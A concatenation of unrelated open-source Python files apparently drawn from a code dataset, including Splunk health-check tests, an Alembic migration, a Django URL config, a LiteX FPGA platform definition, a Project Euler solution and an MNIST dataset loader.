self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [self.instance])
health.reset()
aggregator.reset()
self.check.commit_state(None)
def test_no_topology_defined(self):
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id,
self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15},
{})
def test_health_data(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'},
{'checkStateId': u'disk_sdb',
'health': 'CRITICAL',
'name': u'disk sdb usage',
'topologyElementIdentifier': u'component2'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 0)
def test_incomplete_health(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "incomplete_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() != ''
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_partially_incomplete(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "partially_incomplete_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 1)
self.assertEqual(service_checks[0].message,
"The saved search 'partially_incomplete_health' contained 1 incomplete records")
def test_wrong_health(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "wrong_health",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
health.assert_snapshot(self.check.check_id, self.check.health.stream,
{'expiry_interval_s': 0, 'repeat_interval_s': 15}, {},
[{'checkStateId': u'disk_sda',
'health': 'CLEAR',
'message': u'disk sda is ok',
'name': u'disk sda usage',
'topologyElementIdentifier': u'component1'}
])
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 1)
self.assertEqual(service_checks[0].message,
"The saved search 'wrong_health' contained 1 incomplete records")
def test_handle_saved_search_run_error(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "dispatch_exception",
"parameters": {}
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert "BOOM" in self.check.run()
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_ignore_saved_search_run_error(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "dispatch_exception",
"parameters": {}
}],
'ignore_saved_search_errors': True,
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
def test_default_parameters(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health"
}],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'dispatch.now': True,
'force_dispatch': True,
'output_mode': 'json'}
def test_non_default_parameters(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health"
}],
'collection_interval': 15
}
init_config = {
'default_parameters': {
'respect': 'me'
}
}
self.check = MockedSplunkHealth(self.CHECK_NAME, init_config, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'respect': 'me', 'output_mode': 'json'}
def test_non_default_parameters_override(self):
instance = {
'url': 'http://localhost:8089',
'authentication': {
'basic_auth': {
'username': "admin",
'password': "admin"
}
},
'saved_searches': [{
"name": "health",
"parameters": {
"respect": "me"
}
}],
'collection_interval': 15
}
init_config = {
'default_parameters': {
'default_should': 'be_ignore'
}
}
self.check = MockedSplunkHealth(self.CHECK_NAME, init_config, {}, [instance])
assert self.check.run() == ''
assert self.check.instance_data.splunk_client._dispatch_parameters == {'respect': 'me', 'output_mode': 'json'}
def test_check_valid_initial_token(self):
"""
Splunk topology check should work with valid initial token
"""
instance = {
'url': 'http://localhost:8089',
'authentication': {
'token_auth': {
'name': "admin",
'initial_token': "dsfdgfhgjhkjuyr567uhfe345ythu7y6tre456sdx",
'audience': "search",
'renewal_days': 10
}
},
'saved_searches': [],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
assert self.check.run() == ''
def test_check_invalid_initial_token(self):
"""
Splunk check should not work with invalid initial token and stop the check
"""
instance = {
'url': 'http://localhost:8089',
'authentication': {
'token_auth': {
'name': "admin",
'initial_token': "dsfdgfhgjhkjuyr567uhfe345ythu7y6tre456sdx",
'audience': "search",
'renewal_days': 10
}
},
'saved_searches': [],
'collection_interval': 15
}
self.check = MockedSplunkHealth(self.CHECK_NAME, {}, {}, [instance])
# Run once to initialize
assert self.check.run() == ''
aggregator.reset()
self.check.instance_data.splunk_client.invalid_token = True
assert self.check.run() == ''
msg = "Current in use authentication token is expired. Please provide a valid token in the YAML and restart " \
"the Agent"
service_checks = aggregator.service_checks(SplunkHealth.SERVICE_CHECK_NAME)
self.assertEqual(service_checks[0].status, 2)
self.assertEqual(service_checks[0].message, msg)
|
nilq/baby-python
|
python
|
import yaml
import os
import json
import logging
import time
def read_yaml(path_to_yaml: str) -> dict:
with open(path_to_yaml) as yaml_file:
content = yaml.safe_load(yaml_file)
logging.info(f"yaml file: {path_to_yaml} loaded successfully")
return content
|
nilq/baby-python
|
python
|
from math import sqrt
import numpy as np
# tools used in production
# ---------------------------------------------------------------------------------------------
def combine_mean_std(l_n, l_mean, l_std):
"""
Ref: https://www.statstodo.com/index.php and
Altman DG, Machin D, Bryant TN and Gardner MJ. (2000)
Statistics with Confidence Second Edition.
BMJ Books ISBN 0 7279 1375 1. p. 28-31
:param l_n: the sample size of each group
:param l_mean: the mean value of each group
:param l_std: the standard deviation value of each group
:return: Combined sample size, mean value and standard deviation value
"""
l_sum_x = [n * mean for n, mean in zip(l_n, l_mean)]
l_sum_x2 = [sd ** 2 * (n - 1) + sum_x ** 2 / n for n, sd, sum_x in zip(l_n, l_std, l_sum_x)]
tn, tx, txx = sum(l_n), sum(l_sum_x), sum(l_sum_x2)
return tn, tx / tn, sqrt((txx - tx ** 2 / tn) / (tn - 1))
def remove_eta_phi(x):
"""
used by algs `DecayModeLSTMNoEtaPhi`
:param x: torch.Tensor
:return:
"""
return x[:, :, [i for i in range(x.size()[2]) if i != 0 and i != 2]].contiguous()
# useful NumPy manipulation, not used in production (!)
# ---------------------------------------------------------------------------------------------
def log10(arr, epsilon=0.0):
"""
:param arr: np.ndarray
:param epsilon: constant preventing log10(0)
:return: np.ndarray
"""
masked = np.ma.masked_equal(arr, 0)
masked = np.log10(np.maximum(masked, epsilon))
return masked.filled(0)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
from helper import IcebergUnitTestCase
class ClientAddresses(IcebergUnitTestCase):
def test_create(self):
"""
Create an address for the user
"""
self.login()
self.create_user_address()
def test_read(self):
"""
Try to fetch the address created before
"""
self.login()
addresses = self.api_handler.me().addresses()
self.assertNotEqual(len(addresses), 0)
|
nilq/baby-python
|
python
|
"""Create organisation table
Revision ID: ba9997532100
Revises:
Create Date: 2021-11-08 14:36:59.635469
"""
import sqlalchemy as sa
# revision identifiers, used by Alembic.
from app.db.utils import UtcNow
from alembic import op
revision = "ba9997532100"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"Organisations",
sa.Column("OrganisationID", sa.String(length=64), primary_key=True),
sa.Column("Name", sa.VARCHAR(255), index=True, nullable=False, unique=True),
sa.Column("Created", sa.DateTime(), nullable=False, server_default=UtcNow()),
sa.Column(
"Updated",
sa.DateTime(),
nullable=False,
server_default=UtcNow(),
onupdate=UtcNow(),
),
sa.PrimaryKeyConstraint("OrganisationID"),
)
def downgrade():
op.drop_table("Organisations")
|
nilq/baby-python
|
python
|
# trivial example = 30/50 = 3/5
# non-trivial example = 49/98 = 4/8
# There are 4 non-trivial types of these fractions < 1 and both numerator and
# denominator contain two digits find the the product of the four in its
# lowest common terms, what is the denominator?
import timeit
import itertools
from functools import reduce
from operator import truediv
try:
range = xrange
except NameError:
pass
start = timeit.default_timer()
def gcd(a, b):
if a % b == 0:
return b
return gcd(b, a % b)
def euler_33():
numerators = denominators = 1
fractions = (f for f in itertools.combinations(range(10, 100), 2)
if not any(i % 10 == 0 or i % 11 == 0 for i in f))
floordiv = lambda v: v // 10
mod = lambda v: v % 10
for fraction in fractions:
numerator, denominator = fraction
if mod(numerator) == mod(denominator):
ops = (floordiv, floordiv)
elif mod(numerator) == floordiv(denominator):
ops = (floordiv, mod)
elif floordiv(numerator) == mod(denominator):
ops = (mod, floordiv)
elif floordiv(numerator) == floordiv(denominator):
ops = (mod, mod)
else: continue
numerator, denominator = ops[0](numerator), ops[1](denominator)
if truediv(numerator, denominator) == reduce(truediv, fraction):
numerators *= fraction[0]
denominators *= fraction[1]
return denominators / gcd(denominators, numerators)
print('Answer: {}'.format(euler_33()))
stop = timeit.default_timer()
print('Time: {0:9.5f}'.format(stop - start))
|
nilq/baby-python
|
python
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('assignments/', views.AssignmentListView.as_view(), name='assignments'),
path('assignment/<int:pk>', views.AssignmentDetailView.as_view(), name='assignment-detail'),
path('units/', views.UnitListView.as_view(), name='units'),
path('unit/<int:pk>', views.UnitDetailView.as_view(), name='unit-detail'),
]
|
nilq/baby-python
|
python
|
from stormed.method.codegen.tx import *
|
nilq/baby-python
|
python
|
from litex.build.generic_platform import *
from litex.build.xilinx import XilinxPlatform, XC3SProg
_io = [
#OSC
("clk_50", 0, Pins("T7"), IOStandard("LVCMOS33")),
# RESET
("resetn", 0, Pins("C3"), IOStandard("LVCMOS33"), Misc("PULLDOWN")), #UNUSED PIN
# EVERLOOP CONTROL
("everloop_ctl", 0, Pins("A9"), IOStandard("LVCMOS33")),
#######################
# RPi SPI BUS
#######################
("rpi_sck" , 0, Pins("R9"), IOStandard("LVCMOS33")),
("rpi_mosi" , 0, Pins("M10"), IOStandard("LVCMOS33")),
("rpi_miso" , 0, Pins("M9"), IOStandard("LVCMOS33")),
("rpi_ss" , 0, Pins("N9"), IOStandard("LVCMOS33")),
("spiflash", 0,
Subsignal("cs_n", Pins("T3")),
Subsignal("clk", Pins("R11")),
Subsignal("mosi", Pins("T10")),
Subsignal("miso", Pins("P10"), Misc("PULLUP")),
IOStandard("LVCMOS33"), Misc("SLEW=FAST")),
#######################
# ESP32 SPI BUS
#######################
("esp_sck" , 0, Pins("B3"), IOStandard("LVCMOS33")), #ESP_IO32
("esp_mosi" , 0, Pins("C5"), IOStandard("LVCMOS33")), #ESP_IO33
("esp_miso" , 0, Pins("K6"), IOStandard("LVCMOS33")), #ESP_IO21
("esp_ss" , 0, Pins("L3"), IOStandard("LVCMOS33")), #ESP_IO23
("EN_ESP" , 0, Pins("A4"), IOStandard("LVCMOS33")),
("EN_PROG_ESP" , 0, Pins("F3"), IOStandard("LVCMOS33")),
("ESP_TX" , 0, Pins("L5"), IOStandard("LVCMOS33")),
("ESP_RX" , 0, Pins("K5"), IOStandard("LVCMOS33")),
("GPIO_24" , 0, Pins("A14"), IOStandard("LVCMOS33"), Misc("PULLUP")), #RPI_GPIO24 to EN_PROG_ESP
("GPIO_25" , 0, Pins("B14"), IOStandard("LVCMOS33"), Misc("PULLUP")) ,#RPI_GPIO25 to EN_ESP
("serial", 0,
Subsignal("tx" , Pins("A12")),
Subsignal("rx" , Pins("B12")),
IOStandard("LVCMOS33")
),
# NET "GPIO_12" LOC = "N8" | IOSTANDARD = LVCMOS33 ;
# NET "GPIO_16" LOC = "P8" | IOSTANDARD = LVCMOS33 ;
#######################
# AUDIO OUTPUT
#######################
("dac_output<0>", 0, Pins("E1"), IOStandard("LVCMOS33")),
("dac_output<1>", 0, Pins("F1"), IOStandard("LVCMOS33")),
("dac_volumen" , 0, Pins("C1"), IOStandard("LVCMOS33")),
("dac_mute" , 0, Pins("B1"), IOStandard("LVCMOS33")),
("dac_hp_nspk" , 0, Pins("D1"), IOStandard("LVCMOS33")),
#NET "hp_detect" LOC = "T4" | IOSTANDARD = LVCMOS33;
#######################
# MIC ARRAY #
#######################
("pdm_clk" , 0, Pins("B5"), IOStandard("LVCMOS33")),
("pdm_data<0>", 0, Pins("E6"), IOStandard("LVCMOS33")),
("pdm_data<1>", 0, Pins("B8"), IOStandard("LVCMOS33")),
("pdm_data<2>", 0, Pins("A8"), IOStandard("LVCMOS33")),
("pdm_data<3>", 0, Pins("C7"), IOStandard("LVCMOS33")),
("pdm_data<4>", 0, Pins("A7"), IOStandard("LVCMOS33")),
("pdm_data<5>", 0, Pins("A6"), IOStandard("LVCMOS33")),
("pdm_data<6>", 0, Pins("B6"), IOStandard("LVCMOS33")),
("pdm_data<7>", 0, Pins("A5"), IOStandard("LVCMOS33")),
("mic_irq<0>" , 0, Pins("R7"), IOStandard("LVCMOS33")), #RPI_GPIO6
("mic_irq<1>" , 0, Pins("H4"), IOStandard("LVCMOS33")), #ESP_IO5
#######################
# EXP-CONN #
#######################
("gpio_io<15>", 0, Pins("R2"), IOStandard("LVCMOS33")),
("gpio_io<14>", 0, Pins("R1"), IOStandard("LVCMOS33")),
("gpio_io<13>", 0, Pins("P2"), IOStandard("LVCMOS33")),
("gpio_io<12>", 0, Pins("P1"), IOStandard("LVCMOS33")),
("gpio_io<11>", 0, Pins("N1"), IOStandard("LVCMOS33")),
("gpio_io<10>", 0, Pins("M2"), IOStandard("LVCMOS33")),
("gpio_io<9>" , 0, Pins("M1"), IOStandard("LVCMOS33")),
("gpio_io<8>" , 0, Pins("L1"), IOStandard("LVCMOS33")),
("gpio_io<7>" , 0, Pins("K2"), IOStandard("LVCMOS33")),
("gpio_io<6>" , 0, Pins("K1"), IOStandard("LVCMOS33")),
("gpio_io<5>" , 0, Pins("J3"), IOStandard("LVCMOS33")),
("gpio_io<4>" , 0, Pins("J1"), IOStandard("LVCMOS33")),
("gpio_io<3>" , 0, Pins("H2"), IOStandard("LVCMOS33")),
("gpio_io<2>" , 0, Pins("H1"), IOStandard("LVCMOS33")),
("gpio_io<1>" , 0, Pins("G3"), IOStandard("LVCMOS33")),
("gpio_io<0>" , 0, Pins("G1"), IOStandard("LVCMOS33")),
#DDR2 pins
("ddram_clock", 0,
Subsignal("p", Pins("G12")),
Subsignal("n", Pins("H11")),
IOStandard("MOBILE_DDR")),
("ddram", 0,
Subsignal("a", Pins("H15 H16 F16 H13 C16 J11 J12 F15 F13 F14 C15 G11 D16")), #13 pins
Subsignal("ba", Pins("G14 G16")), #2 pins
Subsignal("cke", Pins("D14")),
Subsignal("ras_n", Pins("J13")),
Subsignal("cas_n", Pins("K14")),
Subsignal("we_n", Pins("E15")),
Subsignal("dq", Pins("L14 L16 M15 M16 J14 J16 K15 K16 P15 P16 R15 R16 T14 T13 R12 T12")), #16 pins
Subsignal("dqs", Pins("N14 R14")), #2 pins #LDQS+ & UDQS+ : Check on this
Subsignal("dm", Pins("K11 K12")), #2 pins- LDM UDM : Check on this
IOStandard("MOBILE_DDR")
)
]
_connectors = [
]
class Platform(XilinxPlatform):
name = "matrix_voice"
default_clk_name = "clk_50"
default_clk_period = 20 #ns- as advised by Andres
# The MATRIX Voice has a XC6SLX9 which bitstream takes up ~2.6Mbit (1484472 bytes)
# 0x80000 offset (4Mbit) gives plenty of space
gateware_size = 0x80000
# MX25L6406E - component
# 16Mb - 75 MHz clock frequency
# FIXME: Create a "spi flash module" object in the same way we have SDRAM
# module objects.
# /* name, erase_cmd, chip_erase_cmd, device_id, pagesize, sectorsize, size_in_bytes */
# FLASH_ID("st m25p16", 0xd8, 0xc7, 0x00152020, 0x100, 0x10000, 0x200000),
spiflash_model = "25l6406e" #mx25l6406e
spiflash_read_dummy_bits = 4 #2048 equal sectors, 4 kb each
spiflash_clock_div = 4
spiflash_total_size = int((64/8)*1024*1024) # 64Mbit
spiflash_page_size = 256 #256 bytes
spiflash_sector_size = 0x01000 #4 kB each
def __init__(self): #maybe include self, programmer="xc3sprog" since we use that to flash bit file to MATRIX Voice
XilinxPlatform.__init__(self, "xc6slx9-2ftg256", _io, _connectors)
#XC3SProg("matrix_voice")
def create_programmer(self):
raise NotImplementedError
|
nilq/baby-python
|
python
|
"""Infer properties of TensorFlow nodes.
"""
from lucid.misc.graph_analysis.overlay_graph import OverlayNode, OverlayGraph
import tensorflow as tf
def as_tensor(t):
if isinstance(t, OverlayNode):
return t.tf_node
elif isinstance(t, tf.Operation):
return t.outputs[0]
elif isinstance(t, tf.Tensor):
return t
def infer_data_format(t):
"""Infer data_format of a conv net activation.
Inputs:
t: a tf.Tensor, tf.Op, or OverlayNode
Returns: "NHWC", "NCHW", or None
"""
if str(t.shape) == "<unknown>" or len(t.shape) != 4:
return None
next_candidates = [as_tensor(t)]
for n in range(5): # 5 is random sanity limit on recursion
inps = []
for t in next_candidates:
# Easiest way to find out if a tensor has an attribute seems to be trying
try:
return t.op.get_attr("data_format").decode("ascii")
except:
inps.extend(t.op.inputs)
next_candidates = inps
return None
|
nilq/baby-python
|
python
|
"""
ABOTS: A Bunch Of Tiny Scripts
==============================
The name of this project explains what it is, a bunch of tiny scripts.
I find myself thinking of many different projects that all require some core
functionality that many other projects can share.
However, it must be laid down first before adding the "unique" code that my
ideas consist of.
The usual approach to this issue is using an existing framework someone else
wrote, but then you need to understand how that framework does things and fit
your application to fit that mindset.
As well, you now have this black box in your application that you do not 100%
understand and adds another layer of abstraction that makes debugging issues
that much harder (we all make bugs, so do framework devs).
With that being said, ideologically I do not like using existing frameworks
since that deprives me of the opportunity to learn how that particular piece of
software works.
So ABOTS is my approach of making a shared library of code that I want to use
in other projects.
Any improvements here can then improve my other projects, as well as give me
something small to work on when I am in-between projects that could eventually
be useful later on.
The ideas of these scripts are to be as modular as possible so that they can be
used in a variety of different projects with little changes needed.
Due to the nature of the project, this will probably not be too useful for
other developers who are not me, but it could be useful to see how a particular
component of ABOTS works since the project is optimized more towards
versitlity and simplicity than being the most efficient way of doing something
at the expense of being harder to understand.
Now that you know what lies here, proceed with caution.
You have been warned.
~aewens
"""
|
nilq/baby-python
|
python
|
from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['DismissCard', 'DismissCardInterface']
class DismissCardInterface(ApiInterfaceBase):
card_id: int
image_url: str
title: AnyType
message: AnyType
button_text: AnyType
camera_target: AnyType
face_filter_id: AnyType
class DismissCard(PropertyMapper, DismissCardInterface):
pass
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 1 15:52:30 2020
@author: liu
"""
NAME = 'FCS'
DESCR = """
This example uses **Pulse Streamer** to emulate signals for fluorescence correlation spectroscopy (FSC).
The example demonstrates autocorrelation measurement with logarithmic binning.
* Channel 1 - fluorescence photons
"""
import random as rnd
def pattFCS(cells, counts, window, time):
cell_period = int(window/cells-time)
photon_period = int(time/counts)
pattern = [(0, 0)]
for c in range(cells):
rnd_counts = rnd.randint(int(0.8*counts), int(1.2*counts))
for i in range(rnd_counts):
pattern.append((3, 1))
tag= rnd.randint(3, int(2*photon_period))
pattern.append((tag, 0))
skip = rnd.randint(3, int(2*cell_period))
pattern.append((skip, 0))
return pattern
def main(pulsestreamer_ip='192.168.178.128'):
""" This is the main function of the example.
Parameters:
pulsestreamer_ip - IP address of the Pulse Streamer.
The default value corresponds to the
direct connection of the Pulse Streamer
to the network card of your PC.
"""
# import API classes into the current namespace
from pulsestreamer import PulseStreamer
# connect to the Pulse Streamer
ps = PulseStreamer(pulsestreamer_ip)
# create a sequence-object
sequence = ps.createSequence()
# parameters for FCS pattern
n_cells = 10
em_counts = 1000
meas_window = 1e9 # in ns, 1s
pass_time = 1e5 # in ns, 100us
# generate new pattern every second and stream
while True:
# generate and assign the pattern to a digital output of PS
patt1 = pattFCS(n_cells, em_counts, meas_window, pass_time)
sequence.setDigital(1, patt1)
ps.stream(sequence, 1)
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# ___ _ ___ ___ _ |
# / _ \ __| |_ ___| _ \/ __| | | Create 8-bit-like games!
# | (_) / _| _/ _ \ _/ (_ |_| | Author: Death_Miner
# \___/\__|\__\___/_| \___(_) | Version: 0.4.0
# |
#
# @ octopg/data.py => Handles multiple data files
# We use the JSON format for all data files.
import json
import os
# Current opened files list
files = {}
# Current data of files
d = {}
"""
init()
Loads the required files for the octopg engine
@return void
"""
def init():
# We load the main config file
load_file("config", "data/config.json", "data/config.default.json")
"""
load_file()
Loads a data file and decodes it
@param name (str) The name to use for this file
@param path (str) Path of the data file
@param default_path (str) Path of the default data file
@return void
"""
def load_file(name, path, default_path = None):
global files, d
# Do some debug for the developers
print("- Loading '"+name+"' data file")
print(" => "+path)
# Load only the file once
if name not in files:
# Get the path of the default file
if default_path == None:
# Generate the path of the default data file.
# It should be (original basename)/(original filename).default.(original extension)
default_file = os.path.basename(path).split(".")
default_file.insert(-1, "default")
default_path = os.path.dirname(path) + "/" + ".".join(default_file)
# Check if the config file exists
if os.path.exists(path):
# Open this file
with open(path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# The file doesn't exists, try to open a default config file
elif os.path.exists(default_path):
# Open this file
with open(default_path, "r") as f:
# Decode the JSON file and add it to the data list
d[name] = json.loads(f.read())
# Add the file we want to load to the file list
files[name] = path
# Debug
print("Done.")
# We didn't find any file... Shame!
else:
print("File not found.")
# Show this when file already loaded
else:
print("File already loaded.")
"""
save_file()
Saves a data file
@param name (str) The name of the data file
@return void
"""
def save_file(name):
global files, d
# Do some debug for the developers
print("- Saving '"+name+"' data file")
print(" => "+files[name])
# Check first is file was loaded
if name in files:
# Open the file and write the new JSON encoded data
with open(files[name], "w") as f:
f.write(json.dumps(d[name], sort_keys=True, indent=4))
# Debug
print("Done.")
# The file is not loaded, we can't save it obviously
else:
print("File not loaded.")
"""
close_file()
Saves a data file and close it (removes it from the list)
@param name (str) The name of the data file
@return void
"""
def close_file(name):
global files, d
# Do some debug for the developers
print("- Closing '"+name+"' data file")
# Check first is file was loaded
if name in files:
# Save the file
save_file(name)
# Delete the data & file from memory
del d[name]
del files[name]
# Debug
print("Done.")
# The file is not loaded, we can't close it obviously
else:
print("File not loaded.")
"""
close_all()
Closes all the opened data files
@return void
"""
def close_all():
# list of files to close
to_close = [name for name in files]
# Close them all
for name in to_close:
close_file(name)
|
nilq/baby-python
|
python
|
__all__ = [
"same"
, "same_attrs"
# Can be used to implement interface of `same`.
# __same__ = same_{implementation}
, "same_vectors"
, "same_sets"
, "same_mappings"
]
from types import (
GeneratorType
)
from six.moves import (
zip_longest
)
from collections import (
Mapping
)
class End(object):
"Allows `same_vectors` to support iterators."
__same__ = lambda *_ : False
end = End
def same_vectors(a, b):
"Recursive. Order sensitive. Complexity is O(min(len(a), len(b)) + 1)."
for ea, eb in zip_longest(a, b, fillvalue = end):
if not same(ea, eb):
return False
return True
def same_sets(a, b):
"Recursive. Ignores order. Complexity is O(len(a) * len(b))."
restb = list(b)
for ea in a:
for i, eb in enumerate(restb):
if same(ea, eb):
del restb[i]
break
else:
return False
return not restb
def same_mappings(a, b):
"Recursive. Ignores order. Complexity is O(min(len(a), len(b)))."
restb = set(b)
for ka in a:
if ka in b:
ea = a[ka]
eb = b[ka]
if same(ea, eb):
restb.remove(ka)
continue
return False
return not restb
def _is_b_iterable(checker):
def wrapper(a, b):
# Iterables or not? See: https://stackoverflow.com/a/1952481/7623015
try:
_ = (e for e in b)
except TypeError:
# This duck does not quack.
return False
return checker(a, b)
wrapper.__doc__ = checker.__doc__
return wrapper
def _is_b_mapping(checker):
def wrapper(a, b):
if isinstance(b, Mapping):
return checker(a, b)
return False
wrapper.__doc__ = checker.__doc__
return wrapper
# Exact type match. Inherited classes must provide __same__.
SAME_ALG = {
dict : _is_b_mapping(same_mappings),
list : _is_b_iterable(same_sets),
set : _is_b_iterable(same_sets),
GeneratorType : _is_b_iterable(same_sets),
tuple : _is_b_iterable(same_vectors)
}
def _l_same_r(l, r):
try:
__same__ = l.__same__
except AttributeError:
return NotImplemented
return __same__(r)
def same(a, b):
""" Compares a and b using `__same__` method.
At least one of the objects must define it.
Else, there are comparators for several standard container types (see below).
If a comparator is absent, base Python comparison mechanism is involved.
Ex.:
class AClass(ItsParent):
def __same__(self, other):
# Look for a semantic difference then return `False`.
return True # NotImplemented (same result as when no `__same__`)
This allows to implement user defined comparison which is not influences
standard Python operation.
E.g. such operators as `==` and `in` (and using objects as keys in hash
based mappings).
I.e. with this suite it is possible to store semantically same objects
inside one mapping because they will appear different for Python.
It allows an object to be changed after it has been used as a key (if
the object also defines custom `__eq__` or `__hash__`).
For the last reason an `id(obj)` expression result can be used as a key.
But it can be quite inconvenient and disallows to obtain the reference
back by its id.
"""
res = _l_same_r(a, b)
if res is NotImplemented:
res = _l_same_r(b, a)
if res is NotImplemented:
try:
alg = SAME_ALG[type(a)]
except KeyError:
try:
alg = SAME_ALG[type(b)]
except KeyError:
# redirect to base Python comparison mechanism
res = a == b
else:
res = alg(b, a)
else:
res = alg(a, b)
return res
same.__doc__ += "\nSupported for those container types:\n\n%s" % ("\n\n".join(
cls.__name__ + "\n " + alg.__doc__ for cls, alg in SAME_ALG.items()
))
def same_attrs(a, b, *attrs):
for name in attrs:
if not same(getattr(a, name), getattr(b, name)):
return False
return True
|
nilq/baby-python
|
python
|
from pathlib import Path
from jinja2 import Environment
from jinja2.loaders import BaseLoader
from pathlib import Path
import requests
import json
req = requests.get(r"https://raw.githubusercontent.com/thautwarm/DianaScript-JIT/master/sigs-for-builtin-modules.json")
if req.status_code != 200:
raise IOError("cannot read json spec from remote repo")
SPEC = json.loads(req.text)
env = Environment(
loader = BaseLoader(),
extensions=['jinja2.ext.do'],
trim_blocks=True,
lstrip_blocks=True
)
def find_paths(p: Path):
if not p.is_dir():
if p.suffix == ".in":
yield p
else:
for i in p.iterdir():
if i == p:
continue
yield from find_paths(i)
py_map = {
'Tuple': 'tuple',
'string': 'str'
}
env.filters['each'] = lambda f: lambda seq: map(f, seq)
def assert_(x):
assert x
import builtins
namespace = {**builtins.__dict__, **globals()}
for FROM, TO in [
(path, path.with_suffix("")) for path in find_paths(Path(__file__).parent.parent)
]:
try:
template = env.from_string(FROM.open(encoding='utf8').read())
s = template.render(**namespace)
TO.open('w', encoding='utf8').write(s)
print(TO, "written")
except:
print("error ocurred at", FROM)
raise
|
nilq/baby-python
|
python
|
import torch
from torch.utils.data import Dataset
import numpy as np
class MNISTGraphDataset(Dataset):
def __init__(self, dataset_path, num_thresholded, train=True, intensities=True, num=-1):
if(train):
dataset_tr = np.loadtxt(dataset_path + 'mnist_train.csv', delimiter=',', dtype=np.float32)
dataset_te = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
dataset = np.concatenate((dataset_tr, dataset_te), axis=0)
else:
dataset = np.loadtxt(dataset_path + 'mnist_test.csv', delimiter=',', dtype=np.float32)
print("MNIST CSV Loaded")
if isinstance(num, list):
map1 = list(map(lambda x: x in num, dataset[:, 0]))
dataset = dataset[map1]
elif num > -1:
dataset = dataset[dataset[:, 0] == num]
print(dataset.shape)
X_pre = (dataset[:, 1:] - 127.5) / 255.0
imrange = np.linspace(-0.5, 0.5, num=28, endpoint=False)
xs, ys = np.meshgrid(imrange, imrange)
xs = xs.reshape(-1)
ys = ys.reshape(-1)
self.X = np.array(list(map(lambda x: np.array([xs, ys, x]).T, X_pre)))
if(not intensities):
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:, :2], self.X)))
else:
self.X = np.array(list(map(lambda x: x[x[:, 2].argsort()][-num_thresholded:], self.X)))
self.X = torch.FloatTensor(self.X)
print(self.X.shape)
# print(self.X[0])
print("Data Processed")
def __len__(self):
return len(self.X)
def __getitem__(self, idx):
return self.X[idx]
|
nilq/baby-python
|
python
|
# Copyright 2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
